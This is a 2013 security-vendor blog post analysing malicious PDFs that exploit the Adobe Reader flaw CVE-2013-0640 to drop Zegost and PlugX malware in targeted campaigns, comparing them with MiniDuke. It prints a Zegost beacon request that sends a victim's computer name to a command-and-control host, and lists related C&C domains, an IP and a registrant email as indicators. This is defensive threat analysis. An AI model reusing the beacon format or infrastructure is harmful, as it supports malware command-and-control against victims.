Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    April 2013
    S M T W T F S
    « Mar   May »
     123456
    78910111213
    14151617181920
    21222324252627
    282930  
  • Email Subscription

  • About Us
    TrendLabs Security Intelligence Blog(breadcrumbs are unavailable)

    Archive for April 29th, 2013




    Additional text and analysis by Kyle Wilhoit

    Throughout 2012, we saw a wide variety of APT campaigns leverage an exploit in Microsoft Word (CVE-2012-0158). This represented a shift, as previously CVE-2010-3333 was the most commonly used Word vulnerability. While we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640) that was made infamous by the “MiniDuke” campaign. The malware dropped by these malicious PDFs is not associated with MiniDuke, but it is associated with ongoing APT campaigns.

    Zegost

    One set of malicious PDFs we found that used this exploit contained decoy documents in Vietnamese; the file names were also in the same language.


    Figure 1. Sample decoy document

    The PDFs contain embedded JavaScript code that it similar to the code used by the MiniDuke campaign. These similarities include similar function and variable names.


    Figure 2. Similar JavaScript code

    Analyzing the PDF using Didier Stevens’ PDFiD tool shows that the two PDFs are very similar. They may not be identical, but the similarities between the two are hard to deny. The fields of interest here are “/Javascript”, “/OpenAction”, and “/Page”. These fields mean JavaScript is present, automatic actions of some sort take place, and the page number. These three items helped us identify the similarities between MiniDuke and Zegost.

    The dropped files and data are also similar. Both campaigns drop the same number of files, with very similar file names, with similar purposes. Even the registry modifications are not too dissimilar.

    However, that is where the similarities end. The payload dropped by these PDFs is known as Zegost (or HTTPTunnel) and has been spotted in previous attacks. This has no connection with the MiniDuke malware payload.) The Zegost malware has a distinct beacon:

    GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: dns.yimg.ca
    Cache-Control: no-cache

    The command and control server, dns.yimg.ca, resolves to 223.26.55.122 which has been used by the more well known command and control servers like imm.conimes.com and iyy.conimes.com. The email addresses used to register this domain, llssddzz@gmail.com, has also been used to register scvhosts.com – another known C&C server – and updata-microsoft.com, which is probably also a threat.

    PlugX

    The second set of malicious PDFs are not necessarily directly related to one another, although they all drop different PlugX variants. The targets of the attacks we analyzed appear to have been sent to targets in Japan, South Korea, and India.

    However, although these attacks also exploit CVE-2013-0640, they are different from the samples discussed above. When comparing the files, one can see the differences, such as the PDF version being used:

     

    Zegost

    MiniDuke

    PlugX

     PDF Header: %PDF-1.4  PDF Header: %PDF-1.4  PDF Header: %PDF-1.7
     obj                    8  obj                    8  obj                   43
     endobj                 8  endobj                 8  endobj                44
     stream                 3  stream                 1  stream                10
     endstream              3  endstream              2  endstream             11
     xref                   1  xref                   1  xref                   4
     trailer                1  trailer                1  trailer                4
     startxref              1  startxref              1  startxref              4
     /Page                  1  /Page                  1  /Page                  6
     /Encrypt               0  /Encrypt               1  /Encrypt               0
     /ObjStm                0  /ObjStm                0  /ObjStm                0
     /JavaScript            1  /JavaScript            1  /JavaScript            1
     /AA                    0  /AA                    0  /AA                    0
     /OpenAction            1  /OpenAction            1  /OpenAction            1
     /AcroForm              1  /AcroForm              1  /AcroForm              1
     /JBIG2Decode           0  /JBIG2Decode           0  /JBIG2Decode           0
     /RichMedia             0  /RichMedia             0  /RichMedia             0
     /Launch                0  /Launch                0  /Launch                0
     /EmbeddedFile          0  /EmbeddedFile          0  /EmbeddedFile          0
     /XFA                   1  /XFA                   1  /XFA                   1
     /Colors > 2^24         0  /Colors > 2^24         0  /Colors > 2^24         0

    Read the rest of this entry »

     
    Posted in Malware, Targeted Attacks | Comments Off


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice